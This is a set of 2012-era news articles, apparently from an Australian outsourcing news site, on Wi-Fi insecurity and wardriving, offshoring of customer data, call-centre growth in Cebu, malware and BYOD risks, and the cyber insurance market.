By Matt Smith

With almost 50 per cent of Australia’s internet subscribers using mobile or wireless broadband, serious concerns are being raised about the security of wireless systems and the ease of hacking.

Many residential networks are left vulnerable, because users don’t alter system passwords from their default setting or at times don’t even apply a password at all.

Mark Gregory, a senior lecturer in computer engineering at RMIT, believes it isn’t just residential users that leave themselves vulnerable – businesses and some corporations do as well.

“About 20 per cent of Wi-Fi networks are left unsecure or have poor security. The most a user can do is make sure the password is strong, but even then ‘password security’ is a fallacy.”

Many networks are insufficiently protected with older technology. Wired Equivalent Privacy (WEP), which was developed in 1999, is now outdated and was replaced in 2003 by Wi-Fi Protected Access (WPA).

Dr Gregory says the weakness of most home wireless networks lies with the modem manufacturer – repeated password failure does not lock down most modems, allowing hackers to continue to attempt to break in until they are successful.

“If a system timed out after a number of password failures, that would be enough to deter most would-be hackers,” Dr Gregory says. “A wireless modem should at least be able to prevent brute force attacks. Unfortunately manufacturers have been a bit lax.”

The serious nature of hacking was recently highlighted by Queensland Police, whose fraud squad began a wardriving initiative to help identify unsecure residential wireless internet networks.

Wardriving is the act of searching for Wi-Fi wireless networks from a car using a laptop.

“It’s a positive community support program, and the effort should be supported,” Dr Gregory says. “The issue should be taken seriously, and this response should be carried out in all states.”

With Wi-Fi signals reaching up to 100 metres, a potential hacker could be anywhere. ‘Nick’ (not real name), a computer enthusiast who admits he is not an expert, found it simple to illegally access Wi-Fi.

“A neighbour of mine didn’t have a password on their Wi-Fi,” says Nick. “Another didn’t change their network name or password from the default name of the router.

“You can just chuck it through a program dedicated to generating the password for that particular router. It might take some time, but it works. That’s more cracking than hacking, and it’s simple.”

Nick says there are plenty of forums on the internet dedicated to hacking and cracking, and that no Wi-Fi network will be completely safe.

“With a bit of an understanding of networking, a couple of programs to capture and analyse what’s going into and out of the networks, the right wireless adapter, a Linux operating system, and some patience, you can have whatever network you want,” he says. “There’s no such thing as a bulletproof Wi-Fi network; if someone is devoted enough they’ll get in.”

While many hackers could see it as an innocent challenge, others could be using their illegal Wi-Fi access to commit fraud or serious offences, such as using child pornography.

“These sound maleficent in nature, but it’s like a puzzle to those with a deep interest in the subject,” says Nick. “It’s a challenge, like a Rubik’s cube, and you’ll find that most hackers break in for those reasons alone.”

Many popular and specialised hacking tools are easily accessible through internet search engines. Programs such as Wi-Fi Hacker and NetStumbler are commonly used, and numerous tools and guides can be found on websites such as wardrive.net.

Many of these applications are easy to use. Some, such as iWep Pro, will run on a jailbroken iPhone. It can provide passwords for Wi-Fi networks within minutes.

A Spanish application developer, “Mike Wazowski” (not real name), says he developed the application to provide users with a tool to test the vulnerabilities of their own routers.

“The app will only unlock a network if it’s kept on the default password configuration,” Wazowski says. “I don’t know why so many people don’t change the password on their modem. I haven’t changed my own, so if you ask me, I’m just lazy.”

Wazowski confirms that iWep Pro users have reported good results in Australia, providing passwords for BigPond, Thomson and Speedtouch Wi-Fi modems.

Read more: http://www.theage.com.au/digital-life/consumer-security/why-your-wifi-network-is-never-safe-20120424-1xi2m.html#ixzz1tEzf3YWu

By Mark Atterby – Senior Staff Writer

The Australian Government has raised concerns of offshore dissemination of Australian citizens’ private data in discussions with telecommunications industry.

Should the government legislate on whether customer data can be off-shored or not?
What would that mean for the BPO and Outsourcing Industries?

A recent report from CommsDay.com highlighted how the government has raised some proposals to enhance the security of Australia’s telecom infrastructure. A specific area of concern, according to the CommsDay report, is the extensive use of offshoring in support of the customer service functions of Australian telcos.

Most Australian telecommunication carriers now make use of outsourcing in support of customer service functions, from places including India, Sri Lanka, and the Philippines. The government is proposing that it may require carriers to keep all their customer data onshore or at the very least, require carriers to report full details of all their outsourcing and offshoring activities.

The threat of some Indian or Sri Lankan call centre agent selling peoples personal details to a Ukrainian hacker is factual. Laurence Barlow, from NRG Global Solutions, an Australian provider of outsourcing solutions, comments, “We do fraud work for some of the banks and have visibility of the issue… it’s very real. For the time being we have elected to keep our client data on Australian shores, albeit our call centres are offshore”.

This raises the questions, does that mean we should try and keep all data onshore? And should the government be involved in legislating on the matter? If data has to be kept onshore what impact will it have on existing outsourcing initiatives?

This debate first emerged some years ago, but achieved particular focus around the first evolution of cloud computing and isn’t likely to go away for quite some time.

Chris Luxford, President of Aegis Services Australia, believes that governments should be encouraging debates concerning the security of customer data and privacy: digital fraud is a multi-billion dollar global industry which needs to be tackled, however he believes that the terms used for the debate need to be clarified “Does the situation where a call centre agent in India accessing customer details via a secure VPN with secure login credentials from a database server in Australia, classify as offshoring customer data. Or is it when a database is physically housed in a different country. When we are proposing laws against offshoring data, what are we actually proposing? Is it the physical replication of data offshore or is it the accessing of data offshore?”

Or is it only when an Australian organisation hands over its customer database to a third party offshore provider.

Is the issue one of location or one of security? As Luxford points out, the call centre agent accessing customer details in the situation above needs to write down the details before they could send them to someone else. Alternatively, an overseas hacker could access thousands of records from a security failure in an organisation’s firewall to a database located in Australia.

We can assume Australian’s are comfortable providing confidential financial information to offshore providers, the national trend towards online shopping from around the globe indicates a willingness to trust offshore payment gateways and the proliferation of social media sites like Facebook is testimony to the fact that people will put a lot more than their personal credit card information online.

Australian consumers are targets for overseas scammers and fraudsters. Recently the level of phone scams in Australia has overtaken online scams. The Australian Competition and Consumer Commission released figures last year that showed that 52 per cent of people who have reported scams in 2011 were in fact contacted by telephone.

Most of these scams are generated from overseas locations and outside of Australian jurisdiction, which means the Australian government, can’t prosecute the organisations or the people involved unless they have some connection with an Australian organisation. But these scammers use random generated numbers targeting particular regions with information gleaned from newspapers and the Internet.

The restriction of having data onshore is unlikely to affect the activities of these fraudsters. But there again, these are the last people in the world you want receiving a list of let’s say, a bank’s database of customer details. Their use of it would be unscrupulous and with those details their scam is likely to appear more convincing.

Most BPO and outsourcing providers work closely with their clients to ensure very high levels of security and welcome ongoing debate on how it can be improved. Luxford comments, “You can’t be a successful outsourcer without taking security extremely seriously. Does the industry need to do more? Yes. Security is a journey not a destination. We need to continuously look at how we can improve security. We need to be continuously on the front foot to reduce the fear and improve the confidence of the marketplace”.

Most Australian organisations invest considerable resources in ensuring the security of their data and most have robust practices and standards in place to counter fraud. They can face significant fines, damage to reputation and loss of business if they fail to manage data about their customers adequately and breach privacy regulations.

“Most organisations today are extremely vigilant with customer data and are not allowing other organisations, particularly outsourcers, access to customers data via the providers systems. In many cases I have seen the client demand that the outsourcer not only use their applications, but also use their PCs and hardware”.

In offshoring work, it is important to realise that there are differences in culture and business practices. According to Laurence Barlow, president of NRG Global Solutions, “This doesn’t mean that things are done better or worse in other countries. It’s just different, culturally and how that translates into business practice. The challenge In terms of offshoring work to Asia or anywhere is to ensure consistency.”

Barlow advises that when establishing an offshore operation, to ensure consistency and that security and compliance issues are addressed, is to have Australian management heavily involved in that operation. So whether an Australian Telco is setting up a captive operation or relying on the services of a third party provider, it is important to have Australian management teams working with local teams to ensure consistency, compliance and quality.

Debates and discussion about the security of customer data and privacy, the outsourcing industry greatly supports any open and reasonable discussion. Luxford comments, “ I believe in any legislation or regulatory regime that builds trust and faith for consumers to engage in the digital economy and enjoy the associated benefits. But we must be careful not to over regulate and slow down the growth and development of this economy or the potential for companies to provide goods and services.”

Demand for multi-skilled IT workers knowledgeable in business and big-data specialists, huge spending on cloud and a new era of outsourcing will characterise the year ahead, says market analyst IDC. IDC Australia chief of research Matt Oostveen said in-demand IT workers would need business skills and would increasingly compete with an international pool of highly trained workers operating in cheaper labour markets.

—

Talent2 International Limited (ASX: TWO) announced today that it had been selected by the Queensland Government, through a competitive tender, as the ICT Contractor Resource Manager. The three-year contract will see Talent2 take responsibility for the implementation and management of a Managed Service Program (MSP) across all 13 Queensland Government Agencies. This program will cover the procurement and performance management of all ICT contractors and suppliers that provide services to the Queensland Government. This program will improve the economy, effectiveness and efficiency of ICT contractor resource management for the Queensland Government.

—

SonicWALL, Inc., the leading provider of intelligent network security and data protection solutions, today announced it has expanded its suite of firewall security services with the addition of Kaspersky Anti-Virus to its Enforced Client Anti-Virus and Anti-Spyware solution. SonicWALL® Firewalls ensure easy deployment, provisioning and enforcement of the client on endpoint devices through a unique policy-driven engine. SonicWALL Next-Generation and Unified Threat Management firewalls already provide gateway anti-virus through SonicWALL’s proprietary reassembly-free deep packet inspection anti-malware solution, protecting the perimeter, wireless and VPNs. But viruses can still enter the network through other entry points, including laptops, thumb drives or other unprotected systems. While protection at multiple layers is the best defense against sophisticated modern threats, deploying, maintaining and enforcing the right security software on endpoint devices can strain IT resources and budgets.

—

New Release of Unisys Secure Cloud Computing Solution Gives Clients Better, More Cost-Efficient Resource Management New dashboard capability gives administrators a single, integrated view to better manage their cloud resources and control costs. Release 2.1 includes a new dashboard capability that gives administrators a single, integrated view of all cloud resources: servers, networks, storage systems and more. They can use the dashboard to determine the operational status of specific resources and take necessary actions to respond to business changes in real time, deliver performance mandated by service-level agreements (SLAs) and increase infrastructure productivity.

—

Nespresso revolutionises its Business Solutions after-sales services with Machine-to-Machine solution from Orange. Nespresso Business Solutions is enhancing its B2B coffee machine after-sales service maintenance with a customised machine-to-machine (M2M) solution from Orange Business Services. Nespresso has launched two revolutionary B2B machine models – Aguila and Zenius, the industry’s first connected tabletop coffee machines. These models use embedded SIM cards from Orange that enable the machines to communicate with the Nespresso Customer Relationship Centres. This two-way communication enables remote machine diagnostic and preventative maintenance visits can be scheduled as required.

—

International Recruitment Company HARVEY NASH launches new career opportunities and outsourcing services in Sydney Australia. The company has already gained several years experience in the Australian market working for international clients from its existing world-wide network of 40 offices, including Hong Kong and Vietnam. The new office marks a significant investment in the Australian market, and reflects confidence in the strength of its economy as well as the increasing demand for highly skilled talent both locally and offshore.

Global Increase in Outsourcing Forces Organizations to Improve their Information Security Posture to Prevent Devastating Breaches

“If an organization is looking to do a large infrastructure outsourcing engagement, the best way to ensure that security is a priority is to build a comprehensive list of security requirements into outsourcing contracts, develop appropriate service level agreements and reporting mechanisms to evaluate security and budget for a review by an independent assessment organization. This will ensure that security always stays top of mind,” said panel speaker Chris Oglesby. “If, however, the decision is to outsource infrastructure and security separately, then the security operations should drive the direction and outcomes and create independence between the organizations to meet the client needs.”

In the future, companies need to employ executive IS leaders who will develop methods to adequately protect the IT infrastructure when outsourcing in-house responsibilities. Platforms, such as EC-Council’s CISO Executive Summit Series, provide a means for top-level IS executives to gather and discuss the latest industry challenges. Continuous education and knowledge sharing will provide solutions to the quandaries top-executives face on a daily basis. For more information on upcoming EC-Council CISO Executive Summits, please visit: www.eccouncil.org/cisosummit.

Read more: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2012/02/13/prweb9183078.DTL&ao=2#ixzz1mxxEQyZU

By Marlen D. Limpag

Joel Mari S. Yu Cebu Investment Promotions Center (CIPC) managing director, explained that this thrust is also in line with the recommendation of international research firm Tholons for Cebu to improve its knowledge process outsourcing (KPO) capabilities and make inroads in information technology outsourcing (ITO).

IT-BPO is one of two fast-growing sectors in Cebu, with export sales increasing from barely $200 million in 2005 to $1.5 billion in 2011 based on CIPC estimate, Mr. Yu said during the 2012 Cebu Annual Economic Forum and Investment Briefing initiated by the Cebu Business Club and the University of San Carlos (USC) Economics Department.

Records from the Philippine Export Zone Authority (PEZA) said Cebu currently has 126 foreign direct locators, which employ around 65,000 workers according to CIPC.

The IT-BPO firms are distributed over the following locations: 72 in Asiatown IT Park and eight in Cebu Business Park in Cebu City, one in HVG IT Park in Mandaue City, and 45 in various other buildings.

The bulk of service providers and employees, however, are concentrated on the BPO sub-group, which is the lowest level in the sector and deals with routinary call center work, at 72%, according to Mr. Yu.

KPO has a 13.5% share while ITO has 14.5%.

He said Cebu is working hard to sustain its ranking in a Tholons global study as ninth of top 10 emerging outsourcing cities by putting in investments in infrastructure as well as developing organizations and creating policies that would support the sector’s growth.

It is also taking seriously the recommendations of Tholons to develop a constant supply of skilled workers, maximize its customer support and call center services, and improve its knowledge process and information technology outsourcing capabilities.

“Cebu is growing phenomenally but with it comes an accompanying challenge. We must cope with that growth but we are not doing very well in that direction. We have a product that sells. We are world-class service providers for English-speaking call centers and IT-enabled services,” he said.

Mr. Yu said a comparison study that they asked Tholons to conduct showed Cebu was way above India in basic and analytical abilities but miles behind in software development skills.

Recent assessment tests showed as well that the gap between the needs of the industry and the skills provided by the academe has narrowed, except in verbal ability and American LCT, he added.

Cebu’s lower minimum wage, cheaper food, and less expensive real estate are its cost advantages over Manila, which was fourth in the Tholons ranking, he added.

The five biggest call centers in Cebu ranked according to size are Convergys, Qualfon, Aegis PeopleSupport, Stream Global Services, and Sykes Asia and they employ a total of 17,700 employees.

Cebu could do better, though, Mr. Yu said, citing that Accenture in Manila has a total of 23,000 workers in eight locations.

Since Cebu’s voice locators are from the US, it would suffer if Congress passes a bill restricting offshoring by American firms. Mr. Yu pointed out, however, that there is already an increasing number of KPO and ITO companies here from other countries like Japan, Australia, India and Canada.

Source: BWorld Online

By Martin Conboy, Editor

With so much consumer traffic now moving away from front office call centers, be they outsourced or captive, to the internet or web-based communication systems, the danger of malware is a growing and significant risk to companies that are expanding their universal queue to include online and internet channels, including social media channels. Blue Coat Systems, a leading provider of Web security and WAN optimization solutions, recently announced that its ‘WebPulse‘ collaborative systems had reached a milestone by serving one billion requests for web content in a single day. Nine million of those requests were from Australia.

(Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.)

More than 20 percent of the one billion requests were for search engine / portals – the most consistently requested category and also the leading entry point through which users access malnets (malware networks) More than 10 percent of the requests were for social networking, the third most requested category of content.

Of the billion requests, there were more than one million requests to access content identified as Malware Sources. “The ability of WebPulse to analyse and correlate such a massive amount of information about the web ecosystem creates a powerful defense. This allows us to identify and track the malnets that are responsible for launching attacks on unsuspecting users,” said Greg Singh, Systems Engineering Manager Blue Coat A/NZ.” The more requests Web Pulse receives, the more we understand how these malnets work, the tactics they use and the exploits they serve, which allows us to better protect users through our collaborative defense.”

Anthony James, GM of Blue Coats Cloud Services Division said that BYOD (Bring Your Own Device) is the next evolution of threat to security.

Smartphones and email may have released us from our desks, but they have also chained us to out jobs. Its called “time pollution”, and a new Australian study called ‘The Polluted Times’ study commissioned by the Australia Institute, reports that three out of five employees polled worked outside normal working hours and that one in four said that their employers expected them to work from home. Seven out of eight employees supplied with an office smart phone or laptop worked from home, but more that half (52%) of those who did not have office supplied equipment still worked from home on evenings and week ends.
“Its not necessarily management compelling people to do it, it’s a change in work practices that brings about a whole different way of thinking about work to the detriment of the rest of life.” Explained Josh Fear the Deputy Director of The Australia Institute. The habit is called ‘crackberry”.

So it stands to reason that some people are going to wander off and check out sites that maybe they would not in a 9 to 5 office environment. The rational is that after all nobody misses a slice off a cut loaf.
Also many companies give their employees an allowance to buy the mobile device of choice, be it an iPad, smartphone or laptop. Blue Coats’ James explained that companies need to get serious about mobile device management. They need to control what websites employees can visit, and if they do get to forbidden sites by accident or design they need to be protected from malware when they get there. He explained that it was not about ‘nannying’ people but putting in place web security protocols to protect the business if any employee gets to a site that is infected and that infection acts like a contagion back into the business network.

OUTSOURCING FIRMS are wary of expanding in the near term given perceived risks and low demand from major markets, research firm Ovum yesterday said.

“Companies that provide offshore contact center services face a tough battle to win new business over coming years, as demand in major markets is low,” Ovum said in a statement, citing a poll of leading North American, European and Australian firms.

Only 2% of the firms polled would consider offshoring in the next 12 to 24 months, with another 10% of the firms planning on doing so in 25 to 36 months. A substantial majority, or 80%, said “they had no plans to offshore their contact centers,” Ovum said.

“These numbers will make worrying reading for companies that provide offshore contact center services and are hoping to win new business based on their ability to reduce costs for clients,” Ovum analyst Peter Ryan was quoted as saying.

“Several new barriers to offshoring contact center work have come to the fore and made it a riskier prospect for enterprises. Enterprises feel that the reduced prices simply don’t compensate for the potential to lose customers in these tough economic times,” he added.

The four key issues said to be facing companies are the quality of interaction between agents and customers, stability of the offshore location, pressure in keeping business within the domestic country and fears over data safety.

Ovum noted that low costs had led to regions such as India and South America becoming established contact center locations.

Sought for comment, a representative of the Philippine outsourcing industry said they remained optimistic about business prospects.

“We know that growth of contact center services will slow but the global market will still remain larger than what providers can supply,” Business Process Association of the Philippines (BPAP) Executive Director Gillian Joyce G. Virata said.

“Growth… will be fastest in non-voice BPO (business process outsourcing) and IT (information technology) and in industry-specific services where Philippines has competitive advantages such as banking, financial services, insurance, health care, IT and creative services,” she added.

The BPAP expects the local outsourcing industry to earn $11 billion this year, growing this by at least 20% in 2012. Revenues totalled $9 billion last year.

Source: BWorld Online

By Lamont Wood (Network World)

Heartland Payment Systems figured it was in pretty good shape when it took out a $30 million cyber insurance policy. Unfortunately, the credit card transaction processor was the victim of a massive data breach in early 2009 that resulted in losses estimated at $145 million. The insurance company did pay Heartland the $30 million, but the company was on the hook for the remaining $115 million.

The data breach quiz

So, is cyber insurance worth it? Is it right for your company? What type of coverage should you get? How much is enough? And what are the gotchas to watch out for?

The first point to understand is that standard business insurance does not cover data breaches or almost any other loss involving data. Standard insurance covers tangible losses and damage. Data isn’t tangible.

For that distinction you can thank American Guarantee & Liability Insurance Co. vs. Ingram Micro Inc., a U.S. District Court ruling in Arizona in 2000. The court said that a computer outage caused by a power problem constituted physical damage within the meaning of the policy Ingram Micro had purchased from American Guarantee.

“After that, the insurance firms changed their policies to state that data is not considered tangible property,” says Kevin Kalinich, national managing director for network risk at insurance vendor Aon Risk Solutions. The upshot is that an enterprise needs special cyber insurance to cover data-related issues. The problem is that the field is new and there is no such thing as standard coverage with a standard price.

The resulting complexity is a major source of push-back by potential buyers, according to Larry Ponemon, chairman of the Ponemon Institute, a research organization focused on information security and protection.

“The policies have limitations and constraints similar to home policies with act-of-God provisions, and that has created a lot of uncertainty about what is covered, and what the risks are,” Ponemon says. “Those who are nevertheless purchasing cyber insurance are typically very selective about what coverage they want,” he adds.

Types of cyber coverage currently available include:

Data breach coverage: This pays for expenses that result from a data breach. Covered expenses typically include notification of the victims, setting up a call center, credit monitoring and credit restoration services for the victims, and other crisis management services, says Ken Goldstein, vice president at the Chubb Group, an insurance vendor. “You might want to hire forensic experts, independent attorneys for guidance concerning the multiple state (data breach notification) laws, and public relations experts. The more thoughtful ones respond in a way that shows they are taking the situation seriously,” he says.

Regulatory civil action coverage: Pays in cases where the insured is facing fines from a state attorney general after a data breach, or from the federal government after a violation of the Health Insurance

Portability and Accountability Act (HIPAA,) or similar regulations. Some policies only cover the cost of defending against the action, while others may pay the fine as well, says Steven Haase, head of INSUREtrust, an Atlanta-based specialty insurance provider.

Cyber extortion coverage: For cases where a hacker steals data from the policy holder and then tries to sell it back, or someone plants a logic bomb in the policy holder’s system and demands payment to disable it.

Among other things, the policy should cover the cost of a negotiator, and the expense of offering a reward leading to the arrest of the perpetrator, Goldstein says.

Virus liability: Pays in cases where the policy holder is sued by someone who claims to have gotten a virus from the policy holder’s system.

Content liability: Covers lawsuits filed by people angered over something posted on the Web site of the policy holder. Such coverage should also cover copyright claims and domain name disputes, Haase says.

Lost income coverage: Replaces revenue lost while the policy holder’s computer system or Web site is down.

But Kalinich notes that insurers often apply minimum downtimes of 12 or 24 hours, or require proof of actual losses. “They’ll say that, after all, the customers who did not get through (during the outage) could have come back later,” he says.

Cyber liability insurance: Don’t run a business without it

Loss of data coverage: Pays for the cost of replacing the policy holder’s data in case of loss. “Backup policies are not always effective, and accidents and sabotage happen,” Haase says.

Errors and omissions coverage: Otherwise known as O&M policies, this type of coverage predates cyber insurance, but is increasingly added to cyber policies to cover alleged failures by the policy holder’s software, Haase says.

Your rates may vary

As for what coverage costs, Kalinich says that firms smaller than $100 million in annual revenue can expect to pay $5,000 to $15,000 per million of coverage, while larger firms would pay $10,000 to $25,000. For those over a billion, the price can be in the $20,000 to $50,000 range.

Robert Parisi, senior vice president with Marsh, an insurance broker and risk advisory firm, put it simpler, saying the cost is between $7,000 and $35,000 per million.

Of course, the lower ranges are for buyers who look like better risks — and deciding who is a better risk is another factor that makes cyber insurance a complex topic.

“You cannot get good insurance unless you have good security practices,” Kalinich says. “Due diligence underwriting has become more streamlined as the insurers have learned what to look for. They will typically benchmark you against other members of your industry.”

“Applications are not turned down very often,” adds Haase. “But ‘do you encrypt your data?’ is a common question on an application, and 95% of the prospects don’t. They get scared, and the application process stalls. But almost every insurer will offer coverage anyway — although, for a healthcare firm especially, the policy would be considerably cheaper if it does encrypt.”

“No one question is going to knock you out of consideration — unless you’ve already had millions in losses, or demonstrate extremely poor controls,” agrees says Toby Merrill, vice president of insurer ACE Professional Risk.

But being accepted does not mean that the insurance that is offered will be worth having, cautions Kalinich.

“Some insurers will slap on all sorts of exclusions to make the insurance worse than worthless while they still collect the premium,” he says. “They may say that you are excluded if you don’t stay updated with the latest security software. But no one can stay patched 24-7. If they find that you don’t encrypt your laptops, then they will exclude laptops that are not encrypted. But that is where you need the insurance. So the specific wording of a policy is very important,” he says.

The more sophisticated buyers, says Merrill, are concentrating on what he calls the quality of the coverage.

This would include the insurer’s ability to refer the policy holder to legal and forensic experts if there is a breach, how liberal the insurer is in terms of what it will pay for, and whether prior approval is required before outlays are made, he says.

But, apparently, sophisticated buyers are not the norm, if only because the rapid uptake means there are a lot of first-time buyers.

“For the last five years the market was been rocking along with annual growth of 10 to 15%, while this year it’s 30 to 40%,” Haase says.

“Of the top 100 corporations in a given industry,” estimates Parisi, “Twenty-five percent have bought it, 15 are in the market, and 40 to 50% will be buying it within a year. This coverage is growing fast, and at a time when the economy is distressed.”

Sources credit media coverage of various data breach disasters for spurring the growth. Yet, “We still see prospects with no security plan in place,” Goldstein says.

Beyond that, “For first buyers, it’s painful,” Kalinich says. “They have to coordinate their IT and legal and human resources and risk management departments, and break down the silos for those areas.” (Human resources is involved because of the need to respond to questions about security training practices.)

Enterprises interested in applying for cyber insurance should, as a first step, fill out an insurance application, sources agree. In the end they may not buy the insurance, but the process of filling out the application can be educational.

“Even if they don’t buy any insurance they will understand their exposure better and will be able to discuss it with their boards of directors in an intelligent manner,” Kalinich says.

“There are questions on it you might not have thought of yourself,” Merrill adds. “I’m not saying you should then submit it — just use it to educate yourself. Then bring in a broker.”

On the broker issue, Haase says, “This is a complex purchase and you need a professional helping you.” Most policies are highly customizable, and there are a lot of endorsements — some of which may not even drive up the price — that can be requested if you know what to ask for. For instance, you might add coverage for paper files, both on-site and off.”

Typically the buyer goes to their local agent, and the local agent uses a specialist, Haase says. Both the local agent and the specialist get commissions ranging from 7.5% to 10%, so that 15% to 10% of the premium goes to commissions.

Finally, Merrill cautions that cyber insurance buyers must understand that if they are outsourcing their data handling, they are not at the same time outsourcing their liability if there is a data breach. The onus of the various breach notification laws is on the organization that gathered the data, not on the organization that was storing it when it was exposed, he notes.

“Cyber insurance is not there to replace sound risk management,” Merrill says. “It is there to supplement it.”

Wood is a freelance technology writer in Texas. He can be reached at lwood@texas.net.

Source: TechWorld Australia